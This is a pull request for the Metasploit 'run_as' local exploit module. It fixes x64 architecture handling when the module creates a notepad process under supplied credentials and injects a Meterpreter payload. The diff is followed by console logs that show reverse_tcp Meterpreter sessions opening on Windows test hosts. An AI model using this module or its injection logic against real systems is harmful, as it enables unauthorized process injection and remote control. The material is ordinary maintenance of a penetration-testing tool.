### PR TITLE
Fix `run_as` local exploit module on x64 systems

### DIFF
--- a/lib/msf/core/post/windows/runas.rb
+++ b/lib/msf/core/post/windows/runas.rb
@@ -79,7 +79,7 @@ module Msf::Post::Windows::Runas
      0, # hStdInput
      0, # hStdOutput
      0  # hStdError
-    ].pack('VVVVVVVVVVVVvvVVVV')
+    ].pack(session.arch == ARCH_X64 ? 'QQQQVVVVVVVVvvQQQQ' : 'VVVVVVVVVVVVvvVVVV')
   end
 
   #
@@ -113,7 +113,7 @@ module Msf::Post::Windows::Runas
                                                                       nil,
                                                                       nil,
                                                                       startup_info,
-                                                                      16)
+                                                                      session.arch == ARCH_X64 ? 24 : 16)
     if create_process['return']
       pi = parse_process_information(create_process['lpProcessInformation'])
       print_good("Process started successfully, PID: #{pi[:process_id]}")
@@ -173,7 +173,7 @@ module Msf::Post::Windows::Runas
                                                                       nil,
                                                                       nil,
                                                                       startup_info,
-                                                                      16)
+                                                                      session.arch == ARCH_X64 ? 24 : 16)
 
         if create_process['return']
           begin
@@ -210,7 +210,7 @@ module Msf::Post::Windows::Runas
     fail ArgumentError, 'process_information is nil' if process_information.nil?
     fail ArgumentError, 'process_information is empty string' if process_information.empty?
 
-    pi = process_information.unpack('VVVV')
+    pi = process_information.unpack(session.arch == ARCH_X64 ? 'Q<Q<VV' : 'VVVV')
     { :process_handle => pi[0], :thread_handle => pi[1], :process_id => pi[2], :thread_id => pi[3] }
   end
 

--- a/modules/exploits/windows/local/run_as.rb
+++ b/modules/exploits/windows/local/run_as.rb
@@ -71,11 +71,10 @@ class MetasploitModule < Msf::Exploit::Local
       command_line = nil
       windir = get_env('windir')
 
-      # Select path of executable to run depending the architecture
-      if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X64
+      application_name = "#{windir}\\System32\\notepad.exe"
+      # On x64 systems, select the correct executable path to run if it is a x86 session
+      if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86
         application_name = "#{windir}\\SysWOW64\\notepad.exe"
-      else
-        application_name = "#{windir}\\System32\\notepad.exe"
       end
     end
 

--- a/modules/exploits/windows/local/run_as.rb
+++ b/modules/exploits/windows/local/run_as.rb
@@ -7,6 +7,7 @@ class MetasploitModule < Msf::Exploit::Local
   Rank = ExcellentRanking
   include Msf::Post::Windows::Runas
   include Msf::Post::Windows::Priv
+  include Msf::Post::Windows::Process
 
   def initialize(info = {})
     super(
@@ -71,11 +72,11 @@ class MetasploitModule < Msf::Exploit::Local
       command_line = nil
       windir = get_env('windir')
 
-      application_name = "#{windir}\\System32\\notepad.exe"
-      # On x64 systems, select the correct executable path to run if it is a x86 session
-      if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86
-        application_name = "#{windir}\\SysWOW64\\notepad.exe"
+      unless session.arch == payload.arch.first
+        fail_with(Failure::BadConfig, 'The payload architecture must match the current session architecture.')
       end
+      # The notepad process to spaw needs to have the same architecture than the payload
+      application_name = get_notepad_pathname(payload.arch.first, get_env('windir'), sysinfo['Architecture'])
     end
 
     pi = create_process_with_logon(domain,


### PR DESCRIPTION
This fix the `run_as` local exploit module that was not working on x64 Windows when injecting a payload in a `notepad.exe` process. Before this fix, the module failed because the created process had the wrong architecture.

## Verification

- [ ] Start `msfconsole`
- [ ] Get a session 
- [ ] set the payload option to a Meterpreter payload
- [ ] run `run session=<session ID> user=<username> password=<password>`
- [ ] **Verify** a new session is created
- [ ] **Verify** the user and the architecture for this session

# Example output
## Before the fix
### Windows 10 x64 - x86 Session
```
msf6 exploit(windows/local/run_as) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : WIN10-X64
OS              : Windows 10 (10.0 Build 22000).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x86/windows
meterpreter > getuid
Server username: WIN10-X64\normaluser
meterpreter >
Background session 1? [y/N]
msf6 exploit(windows/local/run_as) >
msf6 exploit(windows/local/run_as) >
msf6 exploit(windows/local/run_as) > run session=1 user=msfuser password=123456

[-] Handler failed to bind to 192.168.0.57:4444:-  -
[-] Handler failed to bind to 0.0.0.0:4444:-  -
[+] Process started successfully, PID: 7808
[-] Unable to create remote thread in target process: Access is denied.
[*] Exploit completed, but no session was created.
```

### Windows 10 x64 - x64 Session
```
msf6 exploit(windows/local/run_as) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : WIN10-X64
OS              : Windows 10 (10.0 Build 22000).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x64/windows
meterpreter > getuid
Server username: WIN10-X64\normaluser
meterpreter >
Background session 1? [y/N]
msf6 exploit(windows/local/run_as) > run session=1 payload=windows/x64/meterpreter/reverse_tcp user=msfuser password=123456

[-] Handler failed to bind to 192.168.0.57:4444:-  -
[-] Handler failed to bind to 0.0.0.0:4444:-  -
[+] Process started successfully, PID: 772
[+] Started thread in target process
[*] Exploit completed, but no session was created.
```

## With this fix
### Windows 10 x86 - x86 Session
```
msf6 exploit(windows/local/run_as) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : WIN10-X86
OS              : Windows 10 (10.0 Build 16299).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x86/windows
meterpreter > getuid
Server username: WIN10-X86\normaluser
meterpreter >
Background session 1? [y/N]
msf6 exploit(windows/local/run_as) > run session=1 user=msfuser password=123456

[-] Handler failed to bind to 192.168.0.57:4444:-  -
[-] Handler failed to bind to 0.0.0.0:4444:-  -
[+] Process started successfully, PID: 6604
[*] Sending stage (175686 bytes) to 192.168.0.122
[+] Started thread in target process
[*] Meterpreter session 2 opened (192.168.0.57:4444 -> 192.168.0.122:50263) at 2022-06-27 06:33:07 -0400
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/run_as) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer        : WIN10-X86
OS              : Windows 10 (10.0 Build 16299).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 5
Meterpreter     : x86/windows
meterpreter > getuid
Server username: WIN10-X86\msfuser
```

### Windows 10 x64 - x86 Session
```
msf6 exploit(windows/local/run_as) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : WIN10-X64
OS              : Windows 10 (10.0 Build 22000).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x86/windows
meterpreter > getuid
Server username: WIN10-X64\normaluser
meterpreter >
Background session 1? [y/N]
msf6 exploit(windows/local/run_as) > run session=1 user=msfuser password=123456

[-] Handler failed to bind to 192.168.0.57:4444:-  -
[-] Handler failed to bind to 0.0.0.0:4444:-  -
[+] Process started successfully, PID: 8020
[*] Sending stage (175686 bytes) to 192.168.0.143
[+] Started thread in target process
[*] Meterpreter session 2 opened (192.168.0.57:4444 -> 192.168.0.143:49882) at 2022-06-27 06:38:33 -0400
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/run_as) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer        : WIN10-X64
OS              : Windows 10 (10.0 Build 22000).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 5
Meterpreter     : x86/windows
meterpreter > getuid
Server username: WIN10-X64\msfuser
```


### Windows 10 x64 - x64 Session
```
msf6 exploit(windows/local/run_as) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : WIN10-X64
OS              : Windows 10 (10.0 Build 22000).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x64/windows
meterpreter > getuid
Server username: WIN10-X64\normaluser
meterpreter >
Background session 1? [y/N]
msf6 exploit(windows/local/run_as) > run session=1 user=msfuser password=123456 payload=windows/x64/meterpreter/reverse_tcp

[-] Handler failed to bind to 192.168.0.57:4444:-  -
[-] Handler failed to bind to 0.0.0.0:4444:-  -
[+] Process started successfully, PID: 776
[*] Sending stage (200774 bytes) to 192.168.0.143
[+] Started thread in target process
[*] Meterpreter session 2 opened (192.168.0.57:4444 -> 192.168.0.143:49885) at 2022-06-27 06:41:04 -0400
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/run_as) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer        : WIN10-X64
OS              : Windows 10 (10.0 Build 22000).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 5
Meterpreter     : x64/windows
meterpreter > getuid
Server username: WIN10-X64\msfuser
```


